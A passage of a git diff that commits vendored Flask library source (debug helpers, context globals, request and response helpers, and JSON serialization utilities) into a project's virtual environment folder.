[{self.request.method}] of {self.app.name}>" + ) diff --git a/env/Lib/site-packages/flask/debughelpers.py b/env/Lib/site-packages/flask/debughelpers.py new file mode 100644 index 00000000..e8360043 --- /dev/null +++ b/env/Lib/site-packages/flask/debughelpers.py @@ -0,0 +1,160 @@ +from __future__ import annotations + +import typing as t + +from .blueprints import Blueprint +from .globals import request_ctx +from .sansio.app import App + + +class UnexpectedUnicodeError(AssertionError, UnicodeError): + """Raised in places where we want some better error reporting for + unexpected unicode or binary data. + """ + + +class DebugFilesKeyError(KeyError, AssertionError): + """Raised from request.files during debugging. The idea is that it can + provide a better error message than just a generic KeyError/BadRequest. + """ + + def __init__(self, request, key): + form_matches = request.form.getlist(key) + buf = [ + f"You tried to access the file {key!r} in the request.files" + " dictionary but it does not exist. The mimetype for the" + f" request is {request.mimetype!r} instead of" + " 'multipart/form-data' which means that no file contents" + " were transmitted. To fix this error you should provide" + ' enctype="multipart/form-data" in your form.' + ] + if form_matches: + names = ", ".join(repr(x) for x in form_matches) + buf.append( + "\n\nThe browser instead transmitted some file names. " + f"This was submitted: {names}" + ) + self.msg = "".join(buf) + + def __str__(self): + return self.msg + + +class FormDataRoutingRedirect(AssertionError): + """This exception is raised in debug mode if a routing redirect + would cause the browser to drop the method or body. This happens + when method is not GET, HEAD or OPTIONS and the status code is not + 307 or 308. 
+ """ + + def __init__(self, request): + exc = request.routing_exception + buf = [ + f"A request was sent to '{request.url}', but routing issued" + f" a redirect to the canonical URL '{exc.new_url}'." + ] + + if f"{request.base_url}/" == exc.new_url.partition("?")[0]: + buf.append( + " The URL was defined with a trailing slash. Flask" + " will redirect to the URL with a trailing slash if it" + " was accessed without one." + ) + + buf.append( + " Send requests to the canonical URL, or use 307 or 308 for" + " routing redirects. Otherwise, browsers will drop form" + " data.\n\n" + "This exception is only raised in debug mode." + ) + super().__init__("".join(buf)) + + +def attach_enctype_error_multidict(request): + """Patch ``request.files.__getitem__`` to raise a descriptive error + about ``enctype=multipart/form-data``. + + :param request: The request to patch. + :meta private: + """ + oldcls = request.files.__class__ + + class newcls(oldcls): + def __getitem__(self, key): + try: + return super().__getitem__(key) + except KeyError as e: + if key not in request.form: + raise + + raise DebugFilesKeyError(request, key).with_traceback( + e.__traceback__ + ) from None + + newcls.__name__ = oldcls.__name__ + newcls.__module__ = oldcls.__module__ + request.files.__class__ = newcls + + +def _dump_loader_info(loader) -> t.Generator: + yield f"class: {type(loader).__module__}.{type(loader).__name__}" + for key, value in sorted(loader.__dict__.items()): + if key.startswith("_"): + continue + if isinstance(value, (tuple, list)): + if not all(isinstance(x, str) for x in value): + continue + yield f"{key}:" + for item in value: + yield f" - {item}" + continue + elif not isinstance(value, (str, int, float, bool)): + continue + yield f"{key}: {value!r}" + + +def explain_template_loading_attempts(app: App, template, attempts) -> None: + """This should help developers understand what failed""" + info = [f"Locating template {template!r}:"] + total_found = 0 + blueprint = None + if request_ctx and request_ctx.request.blueprint is not None: + blueprint = request_ctx.request.blueprint + + for idx, (loader, srcobj, triple) in enumerate(attempts): + if isinstance(srcobj, App): + src_info = f"application {srcobj.import_name!r}" + elif isinstance(srcobj, Blueprint): + src_info = f"blueprint {srcobj.name!r} ({srcobj.import_name})" + else: + src_info = repr(srcobj) + + info.append(f"{idx + 1:5}: trying loader of {src_info}") + + for line in _dump_loader_info(loader): + info.append(f" {line}") + + if triple is None: + detail = "no match" + else: + detail = f"found ({triple[1] or ''!r})" + total_found += 1 + info.append(f" -> {detail}") + + seems_fishy = False + if total_found == 0: + info.append("Error: the template could not be found.") + seems_fishy = True + elif total_found > 1: + info.append("Warning: multiple loaders returned a match for the template.") + seems_fishy = True + + if blueprint is not None and seems_fishy: + info.append( + " The template was looked up from an endpoint that belongs" + f" to the blueprint {blueprint!r}." 
+ ) + info.append(" Maybe you did not place a template in the right folder?") + info.append(" See https://flask.palletsprojects.com/blueprints/#templates") + + app.logger.info("\n".join(info)) diff --git a/env/Lib/site-packages/flask/globals.py b/env/Lib/site-packages/flask/globals.py new file mode 100644 index 00000000..e2c410cc --- /dev/null +++ b/env/Lib/site-packages/flask/globals.py @@ -0,0 +1,51 @@ +from __future__ import annotations + +import typing as t +from contextvars import ContextVar + +from werkzeug.local import LocalProxy + +if t.TYPE_CHECKING: # pragma: no cover + from .app import Flask + from .ctx import _AppCtxGlobals + from .ctx import AppContext + from .ctx import RequestContext + from .sessions import SessionMixin + from .wrappers import Request + + +_no_app_msg = """\ +Working outside of application context. + +This typically means that you attempted to use functionality that needed +the current application. To solve this, set up an application context +with app.app_context(). See the documentation for more information.\ +""" +_cv_app: ContextVar[AppContext] = ContextVar("flask.app_ctx") +app_ctx: AppContext = LocalProxy( # type: ignore[assignment] + _cv_app, unbound_message=_no_app_msg +) +current_app: Flask = LocalProxy( # type: ignore[assignment] + _cv_app, "app", unbound_message=_no_app_msg +) +g: _AppCtxGlobals = LocalProxy( # type: ignore[assignment] + _cv_app, "g", unbound_message=_no_app_msg +) + +_no_req_msg = """\ +Working outside of request context. + +This typically means that you attempted to use functionality that needed +an active HTTP request. Consult the documentation on testing for +information about how to avoid this problem.\ +""" +_cv_request: ContextVar[RequestContext] = ContextVar("flask.request_ctx") +request_ctx: RequestContext = LocalProxy( # type: ignore[assignment] + _cv_request, unbound_message=_no_req_msg +) +request: Request = LocalProxy( # type: ignore[assignment] + _cv_request, "request", unbound_message=_no_req_msg +) +session: SessionMixin = LocalProxy( # type: ignore[assignment] + _cv_request, "session", unbound_message=_no_req_msg +) diff --git a/env/Lib/site-packages/flask/helpers.py b/env/Lib/site-packages/flask/helpers.py new file mode 100644 index 00000000..13a5aa21 --- /dev/null +++ b/env/Lib/site-packages/flask/helpers.py @@ -0,0 +1,623 @@ +from __future__ import annotations + +import importlib.util +import os +import sys +import typing as t +from datetime import datetime +from functools import lru_cache +from functools import update_wrapper + +import werkzeug.utils +from werkzeug.exceptions import abort as _wz_abort +from werkzeug.utils import redirect as _wz_redirect + +from .globals import _cv_request +from .globals import current_app +from .globals import request +from .globals import request_ctx +from .globals import session +from .signals import message_flashed + +if t.TYPE_CHECKING: # pragma: no cover + from werkzeug.wrappers import Response as BaseResponse + from .wrappers import Response + + +def get_debug_flag() -> bool: + """Get whether debug mode should be enabled for the app, indicated by the + :envvar:`FLASK_DEBUG` environment variable. The default is ``False``. + """ + val = os.environ.get("FLASK_DEBUG") + return bool(val and val.lower() not in {"0", "false", "no"}) + + +def get_load_dotenv(default: bool = True) -> bool: + """Get whether the user has disabled loading default dotenv files by + setting :envvar:`FLASK_SKIP_DOTENV`. The default is ``True``, load + the files. 
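+    For example, running with ``FLASK_SKIP_DOTENV=1`` set in the
+    environment makes this return ``False``, so dotenv files are not
+    loaded.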
+ + :param default: What to return if the env var isn't set. + """ + val = os.environ.get("FLASK_SKIP_DOTENV") + + if not val: + return default + + return val.lower() in ("0", "false", "no") + + +def stream_with_context( + generator_or_function: ( + t.Iterator[t.AnyStr] | t.Callable[..., t.Iterator[t.AnyStr]] + ) +) -> t.Iterator[t.AnyStr]: + """Request contexts disappear when the response is started on the server. + This is done for efficiency reasons and to make it less likely to encounter + memory leaks with badly written WSGI middlewares. The downside is that if + you are using streamed responses, the generator cannot access request bound + information any more. + + This function however can help you keep the context around for longer:: + + from flask import stream_with_context, request, Response + + @app.route('/stream') + def streamed_response(): + @stream_with_context + def generate(): + yield 'Hello ' + yield request.args['name'] + yield '!' + return Response(generate()) + + Alternatively it can also be used around a specific generator:: + + from flask import stream_with_context, request, Response + + @app.route('/stream') + def streamed_response(): + def generate(): + yield 'Hello ' + yield request.args['name'] + yield '!' + return Response(stream_with_context(generate())) + + .. versionadded:: 0.9 + """ + try: + gen = iter(generator_or_function) # type: ignore + except TypeError: + + def decorator(*args: t.Any, **kwargs: t.Any) -> t.Any: + gen = generator_or_function(*args, **kwargs) # type: ignore + return stream_with_context(gen) + + return update_wrapper(decorator, generator_or_function) # type: ignore + + def generator() -> t.Generator: + ctx = _cv_request.get(None) + if ctx is None: + raise RuntimeError( + "'stream_with_context' can only be used when a request" + " context is active, such as in a view function." + ) + with ctx: + # Dummy sentinel. Has to be inside the context block or we're + # not actually keeping the context around. + yield None + + # The try/finally is here so that if someone passes a WSGI level + # iterator in we're still running the cleanup logic. Generators + # don't need that because they are closed on their destruction + # automatically. + try: + yield from gen + finally: + if hasattr(gen, "close"): + gen.close() + + # The trick is to start the generator. Then the code execution runs until + # the first dummy None is yielded at which point the context was already + # pushed. This item is discarded. Then when the iteration continues the + # real generator is executed. + wrapped_g = generator() + next(wrapped_g) + return wrapped_g + + +def make_response(*args: t.Any) -> Response: + """Sometimes it is necessary to set additional headers in a view. Because + views do not have to return response objects but can return a value that + is converted into a response object by Flask itself, it becomes tricky to + add headers to it. This function can be called instead of using a return + and you will get a response object which you can use to attach headers. + + If view looked like this and you want to add a new header:: + + def index(): + return render_template('index.html', foo=42) + + You can now do something like this:: + + def index(): + response = make_response(render_template('index.html', foo=42)) + response.headers['X-Parachutes'] = 'parachutes are cool' + return response + + This function accepts the very same arguments you can return from a + view function. 
This for example creates a response with a 404 error + code:: + + response = make_response(render_template('not_found.html'), 404) + + The other use case of this function is to force the return value of a + view function into a response which is helpful with view + decorators:: + + response = make_response(view_function()) + response.headers['X-Parachutes'] = 'parachutes are cool' + + Internally this function does the following things: + + - if no arguments are passed, it creates a new response argument + - if one argument is passed, :meth:`flask.Flask.make_response` + is invoked with it. + - if more than one argument is passed, the arguments are passed + to the :meth:`flask.Flask.make_response` function as tuple. + + .. versionadded:: 0.6 + """ + if not args: + return current_app.response_class() + if len(args) == 1: + args = args[0] + return current_app.make_response(args) # type: ignore + + +def url_for( + endpoint: str, + *, + _anchor: str | None = None, + _method: str | None = None, + _scheme: str | None = None, + _external: bool | None = None, + **values: t.Any, +) -> str: + """Generate a URL to the given endpoint with the given values. + + This requires an active request or application context, and calls + :meth:`current_app.url_for() `. See that method + for full documentation. + + :param endpoint: The endpoint name associated with the URL to + generate. If this starts with a ``.``, the current blueprint + name (if any) will be used. + :param _anchor: If given, append this as ``#anchor`` to the URL. + :param _method: If given, generate the URL associated with this + method for the endpoint. + :param _scheme: If given, the URL will have this scheme if it is + external. + :param _external: If given, prefer the URL to be internal (False) or + require it to be external (True). External URLs include the + scheme and domain. When not in an active request, URLs are + external by default. + :param values: Values to use for the variable parts of the URL rule. + Unknown keys are appended as query string arguments, like + ``?a=b&c=d``. + + .. versionchanged:: 2.2 + Calls ``current_app.url_for``, allowing an app to override the + behavior. + + .. versionchanged:: 0.10 + The ``_scheme`` parameter was added. + + .. versionchanged:: 0.9 + The ``_anchor`` and ``_method`` parameters were added. + + .. versionchanged:: 0.9 + Calls ``app.handle_url_build_error`` on build errors. + """ + return current_app.url_for( + endpoint, + _anchor=_anchor, + _method=_method, + _scheme=_scheme, + _external=_external, + **values, + ) + + +def redirect( + location: str, code: int = 302, Response: type[BaseResponse] | None = None +) -> BaseResponse: + """Create a redirect response object. + + If :data:`~flask.current_app` is available, it will use its + :meth:`~flask.Flask.redirect` method, otherwise it will use + :func:`werkzeug.utils.redirect`. + + :param location: The URL to redirect to. + :param code: The status code for the redirect. + :param Response: The response class to use. Not used when + ``current_app`` is active, which uses ``app.response_class``. + + .. versionadded:: 2.2 + Calls ``current_app.redirect`` if available instead of always + using Werkzeug's default ``redirect``. + """ + if current_app: + return current_app.redirect(location, code=code) + + return _wz_redirect(location, code=code, Response=Response) + + +def abort(code: int | BaseResponse, *args: t.Any, **kwargs: t.Any) -> t.NoReturn: + """Raise an :exc:`~werkzeug.exceptions.HTTPException` for the given + status code. 
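+    For example, a view might use it like this (``find_user`` is a
+    hypothetical lookup)::
+
+        from flask import abort
+
+        @app.route("/user/<int:user_id>")
+        def show_user(user_id):
+            user = find_user(user_id)
+            if user is None:
+                abort(404)
+            return user.name
+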
+ + If :data:`~flask.current_app` is available, it will call its + :attr:`~flask.Flask.aborter` object, otherwise it will use + :func:`werkzeug.exceptions.abort`. + + :param code: The status code for the exception, which must be + registered in ``app.aborter``. + :param args: Passed to the exception. + :param kwargs: Passed to the exception. + + .. versionadded:: 2.2 + Calls ``current_app.aborter`` if available instead of always + using Werkzeug's default ``abort``. + """ + if current_app: + current_app.aborter(code, *args, **kwargs) + + _wz_abort(code, *args, **kwargs) + + +def get_template_attribute(template_name: str, attribute: str) -> t.Any: + """Loads a macro (or variable) a template exports. This can be used to + invoke a macro from within Python code. If you for example have a + template named :file:`_cider.html` with the following contents: + + .. sourcecode:: html+jinja + + {% macro hello(name) %}Hello {{ name }}!{% endmacro %} + + You can access this from Python code like this:: + + hello = get_template_attribute('_cider.html', 'hello') + return hello('World') + + .. versionadded:: 0.2 + + :param template_name: the name of the template + :param attribute: the name of the variable of macro to access + """ + return getattr(current_app.jinja_env.get_template(template_name).module, attribute) + + +def flash(message: str, category: str = "message") -> None: + """Flashes a message to the next request. In order to remove the + flashed message from the session and to display it to the user, + the template has to call :func:`get_flashed_messages`. + + .. versionchanged:: 0.3 + `category` parameter added. + + :param message: the message to be flashed. + :param category: the category for the message. The following values + are recommended: ``'message'`` for any kind of message, + ``'error'`` for errors, ``'info'`` for information + messages and ``'warning'`` for warnings. However any + kind of string can be used as category. + """ + # Original implementation: + # + # session.setdefault('_flashes', []).append((category, message)) + # + # This assumed that changes made to mutable structures in the session are + # always in sync with the session object, which is not true for session + # implementations that use external storage for keeping their keys/values. + flashes = session.get("_flashes", []) + flashes.append((category, message)) + session["_flashes"] = flashes + app = current_app._get_current_object() # type: ignore + message_flashed.send( + app, + _async_wrapper=app.ensure_sync, + message=message, + category=category, + ) + + +def get_flashed_messages( + with_categories: bool = False, category_filter: t.Iterable[str] = () +) -> list[str] | list[tuple[str, str]]: + """Pulls all flashed messages from the session and returns them. + Further calls in the same request to the function will return + the same messages. By default just the messages are returned, + but when `with_categories` is set to ``True``, the return value will + be a list of tuples in the form ``(category, message)`` instead. + + Filter the flashed messages to one or more categories by providing those + categories in `category_filter`. This allows rendering categories in + separate html blocks. The `with_categories` and `category_filter` + arguments are distinct: + + * `with_categories` controls whether categories are returned with message + text (``True`` gives a tuple, where ``False`` gives just the message text). + * `category_filter` filters the messages down to only those matching the + provided categories. 
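+    For example (values shown are illustrative; the messages were
+    flashed during an earlier request)::
+
+        get_flashed_messages(with_categories=True)
+        # -> [('info', 'Profile updated'), ('error', 'Invalid password')]
+
+        get_flashed_messages(category_filter=['error'])
+        # -> ['Invalid password']
+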
+ + See :doc:`/patterns/flashing` for examples. + + .. versionchanged:: 0.3 + `with_categories` parameter added. + + .. versionchanged:: 0.9 + `category_filter` parameter added. + + :param with_categories: set to ``True`` to also receive categories. + :param category_filter: filter of categories to limit return values. Only + categories in the list will be returned. + """ + flashes = request_ctx.flashes + if flashes is None: + flashes = session.pop("_flashes") if "_flashes" in session else [] + request_ctx.flashes = flashes + if category_filter: + flashes = list(filter(lambda f: f[0] in category_filter, flashes)) + if not with_categories: + return [x[1] for x in flashes] + return flashes + + +def _prepare_send_file_kwargs(**kwargs: t.Any) -> dict[str, t.Any]: + if kwargs.get("max_age") is None: + kwargs["max_age"] = current_app.get_send_file_max_age + + kwargs.update( + environ=request.environ, + use_x_sendfile=current_app.config["USE_X_SENDFILE"], + response_class=current_app.response_class, + _root_path=current_app.root_path, # type: ignore + ) + return kwargs + + +def send_file( + path_or_file: os.PathLike | str | t.BinaryIO, + mimetype: str | None = None, + as_attachment: bool = False, + download_name: str | None = None, + conditional: bool = True, + etag: bool | str = True, + last_modified: datetime | int | float | None = None, + max_age: None | (int | t.Callable[[str | None], int | None]) = None, +) -> Response: + """Send the contents of a file to the client. + + The first argument can be a file path or a file-like object. Paths + are preferred in most cases because Werkzeug can manage the file and + get extra information from the path. Passing a file-like object + requires that the file is opened in binary mode, and is mostly + useful when building a file in memory with :class:`io.BytesIO`. + + Never pass file paths provided by a user. The path is assumed to be + trusted, so a user could craft a path to access a file you didn't + intend. Use :func:`send_from_directory` to safely serve + user-requested paths from within a directory. + + If the WSGI server sets a ``file_wrapper`` in ``environ``, it is + used, otherwise Werkzeug's built-in wrapper is used. Alternatively, + if the HTTP server supports ``X-Sendfile``, configuring Flask with + ``USE_X_SENDFILE = True`` will tell the server to send the given + path, which is much more efficient than reading it in Python. + + :param path_or_file: The path to the file to send, relative to the + current working directory if a relative path is given. + Alternatively, a file-like object opened in binary mode. Make + sure the file pointer is seeked to the start of the data. + :param mimetype: The MIME type to send for the file. If not + provided, it will try to detect it from the file name. + :param as_attachment: Indicate to a browser that it should offer to + save the file instead of displaying it. + :param download_name: The default name browsers will use when saving + the file. Defaults to the passed file name. + :param conditional: Enable conditional and range responses based on + request headers. Requires passing a file path and ``environ``. + :param etag: Calculate an ETag for the file, which requires passing + a file path. Can also be a string to use instead. + :param last_modified: The last modified time to send for the file, + in seconds. If not provided, it will try to detect it from the + file path. + :param max_age: How long the client should cache the file, in + seconds. 
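+        For example, ``max_age=3600`` lets the client cache the file
+        for one hour.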
If set, ``Cache-Control`` will be ``public``, otherwise + it will be ``no-cache`` to prefer conditional caching. + + .. versionchanged:: 2.0 + ``download_name`` replaces the ``attachment_filename`` + parameter. If ``as_attachment=False``, it is passed with + ``Content-Disposition: inline`` instead. + + .. versionchanged:: 2.0 + ``max_age`` replaces the ``cache_timeout`` parameter. + ``conditional`` is enabled and ``max_age`` is not set by + default. + + .. versionchanged:: 2.0 + ``etag`` replaces the ``add_etags`` parameter. It can be a + string to use instead of generating one. + + .. versionchanged:: 2.0 + Passing a file-like object that inherits from + :class:`~io.TextIOBase` will raise a :exc:`ValueError` rather + than sending an empty file. + + .. versionadded:: 2.0 + Moved the implementation to Werkzeug. This is now a wrapper to + pass some Flask-specific arguments. + + .. versionchanged:: 1.1 + ``filename`` may be a :class:`~os.PathLike` object. + + .. versionchanged:: 1.1 + Passing a :class:`~io.BytesIO` object supports range requests. + + .. versionchanged:: 1.0.3 + Filenames are encoded with ASCII instead of Latin-1 for broader + compatibility with WSGI servers. + + .. versionchanged:: 1.0 + UTF-8 filenames as specified in :rfc:`2231` are supported. + + .. versionchanged:: 0.12 + The filename is no longer automatically inferred from file + objects. If you want to use automatic MIME and etag support, + pass a filename via ``filename_or_fp`` or + ``attachment_filename``. + + .. versionchanged:: 0.12 + ``attachment_filename`` is preferred over ``filename`` for MIME + detection. + + .. versionchanged:: 0.9 + ``cache_timeout`` defaults to + :meth:`Flask.get_send_file_max_age`. + + .. versionchanged:: 0.7 + MIME guessing and etag support for file-like objects was + removed because it was unreliable. Pass a filename if you are + able to, otherwise attach an etag yourself. + + .. versionchanged:: 0.5 + The ``add_etags``, ``cache_timeout`` and ``conditional`` + parameters were added. The default behavior is to add etags. + + .. versionadded:: 0.2 + """ + return werkzeug.utils.send_file( # type: ignore[return-value] + **_prepare_send_file_kwargs( + path_or_file=path_or_file, + environ=request.environ, + mimetype=mimetype, + as_attachment=as_attachment, + download_name=download_name, + conditional=conditional, + etag=etag, + last_modified=last_modified, + max_age=max_age, + ) + ) + + +def send_from_directory( + directory: os.PathLike | str, + path: os.PathLike | str, + **kwargs: t.Any, +) -> Response: + """Send a file from within a directory using :func:`send_file`. + + .. code-block:: python + + @app.route("/uploads/") + def download_file(name): + return send_from_directory( + app.config['UPLOAD_FOLDER'], name, as_attachment=True + ) + + This is a secure way to serve files from a folder, such as static + files or uploads. Uses :func:`~werkzeug.security.safe_join` to + ensure the path coming from the client is not maliciously crafted to + point outside the specified directory. + + If the final path does not point to an existing regular file, + raises a 404 :exc:`~werkzeug.exceptions.NotFound` error. + + :param directory: The directory that ``path`` must be located under, + relative to the current application's root path. + :param path: The path to the file to send, relative to + ``directory``. + :param kwargs: Arguments to pass to :func:`send_file`. + + .. versionchanged:: 2.0 + ``path`` replaces the ``filename`` parameter. + + .. versionadded:: 2.0 + Moved the implementation to Werkzeug. 
This is now a wrapper to + pass some Flask-specific arguments. + + .. versionadded:: 0.5 + """ + return werkzeug.utils.send_from_directory( # type: ignore[return-value] + directory, path, **_prepare_send_file_kwargs(**kwargs) + ) + + +def get_root_path(import_name: str) -> str: + """Find the root path of a package, or the path that contains a + module. If it cannot be found, returns the current working + directory. + + Not to be confused with the value returned by :func:`find_package`. + + :meta private: + """ + # Module already imported and has a file attribute. Use that first. + mod = sys.modules.get(import_name) + + if mod is not None and hasattr(mod, "__file__") and mod.__file__ is not None: + return os.path.dirname(os.path.abspath(mod.__file__)) + + # Next attempt: check the loader. + try: + spec = importlib.util.find_spec(import_name) + + if spec is None: + raise ValueError + except (ImportError, ValueError): + loader = None + else: + loader = spec.loader + + # Loader does not exist or we're referring to an unloaded main + # module or a main module without path (interactive sessions), go + # with the current working directory. + if loader is None: + return os.getcwd() + + if hasattr(loader, "get_filename"): + filepath = loader.get_filename(import_name) + else: + # Fall back to imports. + __import__(import_name) + mod = sys.modules[import_name] + filepath = getattr(mod, "__file__", None) + + # If we don't have a file path it might be because it is a + # namespace package. In this case pick the root path from the + # first module that is contained in the package. + if filepath is None: + raise RuntimeError( + "No root path can be found for the provided module" + f" {import_name!r}. This can happen because the module" + " came from an import hook that does not provide file" + " name information or because it's a namespace package." + " In this case the root path needs to be explicitly" + " provided." + ) + + # filepath is import_name.py for a module, or __init__.py for a package. + return os.path.dirname(os.path.abspath(filepath)) + + +@lru_cache(maxsize=None) +def _split_blueprint_path(name: str) -> list[str]: + out: list[str] = [name] + + if "." in name: + out.extend(_split_blueprint_path(name.rpartition(".")[0])) + + return out diff --git a/env/Lib/site-packages/flask/json/__init__.py b/env/Lib/site-packages/flask/json/__init__.py new file mode 100644 index 00000000..f15296fe --- /dev/null +++ b/env/Lib/site-packages/flask/json/__init__.py @@ -0,0 +1,170 @@ +from __future__ import annotations + +import json as _json +import typing as t + +from ..globals import current_app +from .provider import _default + +if t.TYPE_CHECKING: # pragma: no cover + from ..wrappers import Response + + +def dumps(obj: t.Any, **kwargs: t.Any) -> str: + """Serialize data as JSON. + + If :data:`~flask.current_app` is available, it will use its + :meth:`app.json.dumps() ` + method, otherwise it will use :func:`json.dumps`. + + :param obj: The data to serialize. + :param kwargs: Arguments passed to the ``dumps`` implementation. + + .. versionchanged:: 2.3 + The ``app`` parameter was removed. + + .. versionchanged:: 2.2 + Calls ``current_app.json.dumps``, allowing an app to override + the behavior. + + .. versionchanged:: 2.0.2 + :class:`decimal.Decimal` is supported by converting to a string. + + .. versionchanged:: 2.0 + ``encoding`` will be removed in Flask 2.1. + + .. versionchanged:: 1.0.3 + ``app`` can be passed directly, rather than requiring an app + context for configuration. 
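+
+    A small example (illustrative data)::
+
+        from flask import json
+
+        json.dumps({"id": 1, "name": "flask"})
+        # -> '{"id": 1, "name": "flask"}'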
+ """ + if current_app: + return current_app.json.dumps(obj, **kwargs) + + kwargs.setdefault("default", _default) + return _json.dumps(obj, **kwargs) + + +def dump(obj: t.Any, fp: t.IO[str], **kwargs: t.Any) -> None: + """Serialize data as JSON and write to a file. + + If :data:`~flask.current_app` is available, it will use its + :meth:`app.json.dump() ` + method, otherwise it will use :func:`json.dump`. + + :param obj: The data to serialize. + :param fp: A file opened for writing text. Should use the UTF-8 + encoding to be valid JSON. + :param kwargs: Arguments passed to the ``dump`` implementation. + + .. versionchanged:: 2.3 + The ``app`` parameter was removed. + + .. versionchanged:: 2.2 + Calls ``current_app.json.dump``, allowing an app to override + the behavior. + + .. versionchanged:: 2.0 + Writing to a binary file, and the ``encoding`` argument, will be + removed in Flask 2.1. + """ + if current_app: + current_app.json.dump(obj, fp, **kwargs) + else: + kwargs.setdefault("default", _default) + _json.dump(obj, fp, **kwargs) + + +def loads(s: str | bytes, **kwargs: t.Any) -> t.Any: + """Deserialize data as JSON. + + If :data:`~flask.current_app` is available, it will use its + :meth:`app.json.loads() ` + method, otherwise it will use :func:`json.loads`. + + :param s: Text or UTF-8 bytes. + :param kwargs: Arguments passed to the ``loads`` implementation. + + .. versionchanged:: 2.3 + The ``app`` parameter was removed. + + .. versionchanged:: 2.2 + Calls ``current_app.json.loads``, allowing an app to override + the behavior. + + .. versionchanged:: 2.0 + ``encoding`` will be removed in Flask 2.1. The data must be a + string or UTF-8 bytes. + + .. versionchanged:: 1.0.3 + ``app`` can be passed directly, rather than requiring an app + context for configuration. + """ + if current_app: + return current_app.json.loads(s, **kwargs) + + return _json.loads(s, **kwargs) + + +def load(fp: t.IO[t.AnyStr], **kwargs: t.Any) -> t.Any: + """Deserialize data as JSON read from a file. + + If :data:`~flask.current_app` is available, it will use its + :meth:`app.json.load() ` + method, otherwise it will use :func:`json.load`. + + :param fp: A file opened for reading text or UTF-8 bytes. + :param kwargs: Arguments passed to the ``load`` implementation. + + .. versionchanged:: 2.3 + The ``app`` parameter was removed. + + .. versionchanged:: 2.2 + Calls ``current_app.json.load``, allowing an app to override + the behavior. + + .. versionchanged:: 2.2 + The ``app`` parameter will be removed in Flask 2.3. + + .. versionchanged:: 2.0 + ``encoding`` will be removed in Flask 2.1. The file must be text + mode, or binary mode with UTF-8 bytes. + """ + if current_app: + return current_app.json.load(fp, **kwargs) + + return _json.load(fp, **kwargs) + + +def jsonify(*args: t.Any, **kwargs: t.Any) -> Response: + """Serialize the given arguments as JSON, and return a + :class:`~flask.Response` object with the ``application/json`` + mimetype. A dict or list returned from a view will be converted to a + JSON response automatically without needing to call this. + + This requires an active request or application context, and calls + :meth:`app.json.response() `. + + In debug mode, the output is formatted with indentation to make it + easier to read. This may also be controlled by the provider. + + Either positional or keyword arguments can be given, not both. + If no arguments are given, ``None`` is serialized. + + :param args: A single value to serialize, or multiple values to + treat as a list to serialize. 
+ :param kwargs: Treat as a dict to serialize. + + .. versionchanged:: 2.2 + Calls ``current_app.json.response``, allowing an app to override + the behavior. + + .. versionchanged:: 2.0.2 + :class:`decimal.Decimal` is supported by converting to a string. + + .. versionchanged:: 0.11 + Added support for serializing top-level arrays. This was a + security risk in ancient browsers. See :ref:`security-json`. + + .. versionadded:: 0.2 + """ + return current_app.json.response(*args, **kwargs) diff --git a/env/Lib/site-packages/flask/json/provider.py b/env/Lib/site-packages/flask/json/provider.py new file mode 100644 index 00000000..3c22bc8f --- /dev/null +++ b/env/Lib/site-packages/flask/json/provider.py @@ -0,0 +1,216 @@ +from __future__ import annotations + +import dataclasses +import decimal +import json +import typing as t +import uuid +import weakref +from datetime import date + +from werkzeug.http import http_date + +if t.TYPE_CHECKING: # pragma: no cover + from ..sansio.app import App + from ..wrappers import Response + + +class JSONProvider: + """A standard set of JSON operations for an application. Subclasses + of this can be used to customize JSON behavior or use different + JSON libraries. + + To implement a provider for a specific library, subclass this base + class and implement at least :meth:`dumps` and :meth:`loads`. All + other methods have default implementations. + + To use a different provider, either subclass ``Flask`` and set + :attr:`~flask.Flask.json_provider_class` to a provider class, or set + :attr:`app.json ` to an instance of the class. + + :param app: An application instance. This will be stored as a + :class:`weakref.proxy` on the :attr:`_app` attribute. + + .. versionadded:: 2.2 + """ + + def __init__(self, app: App) -> None: + self._app = weakref.proxy(app) + + def dumps(self, obj: t.Any, **kwargs: t.Any) -> str: + """Serialize data as JSON. + + :param obj: The data to serialize. + :param kwargs: May be passed to the underlying JSON library. + """ + raise NotImplementedError + + def dump(self, obj: t.Any, fp: t.IO[str], **kwargs: t.Any) -> None: + """Serialize data as JSON and write to a file. + + :param obj: The data to serialize. + :param fp: A file opened for writing text. Should use the UTF-8 + encoding to be valid JSON. + :param kwargs: May be passed to the underlying JSON library. + """ + fp.write(self.dumps(obj, **kwargs)) + + def loads(self, s: str | bytes, **kwargs: t.Any) -> t.Any: + """Deserialize data as JSON. + + :param s: Text or UTF-8 bytes. + :param kwargs: May be passed to the underlying JSON library. + """ + raise NotImplementedError + + def load(self, fp: t.IO[t.AnyStr], **kwargs: t.Any) -> t.Any: + """Deserialize data as JSON read from a file. + + :param fp: A file opened for reading text or UTF-8 bytes. + :param kwargs: May be passed to the underlying JSON library. + """ + return self.loads(fp.read(), **kwargs) + + def _prepare_response_obj( + self, args: tuple[t.Any, ...], kwargs: dict[str, t.Any] + ) -> t.Any: + if args and kwargs: + raise TypeError("app.json.response() takes either args or kwargs, not both") + + if not args and not kwargs: + return None + + if len(args) == 1: + return args[0] + + return args or kwargs + + def response(self, *args: t.Any, **kwargs: t.Any) -> Response: + """Serialize the given arguments as JSON, and return a + :class:`~flask.Response` object with the ``application/json`` + mimetype. + + The :func:`~flask.json.jsonify` function calls this method for + the current application. 
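# Illustrative sketch (not from the vendored Flask source above): a provider
# only has to implement dumps() and loads(); dump(), load(), and response()
# have defaults built on top of them. A minimal provider that forces compact
# separators, wired in through json_provider_class as the class docstring
# describes. CompactJSONProvider and MyFlask are names invented for the example.
import json as _stdlib_json

from flask import Flask
from flask.json.provider import JSONProvider


class CompactJSONProvider(JSONProvider):
    def dumps(self, obj, **kwargs):
        kwargs.setdefault("separators", (",", ":"))
        return _stdlib_json.dumps(obj, **kwargs)

    def loads(self, s, **kwargs):
        return _stdlib_json.loads(s, **kwargs)


class MyFlask(Flask):
    json_provider_class = CompactJSONProvider  # instantiated as app.json at creation


app = MyFlask(__name__)
assert app.json.dumps({"a": [1, 2]}) == '{"a":[1,2]}'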
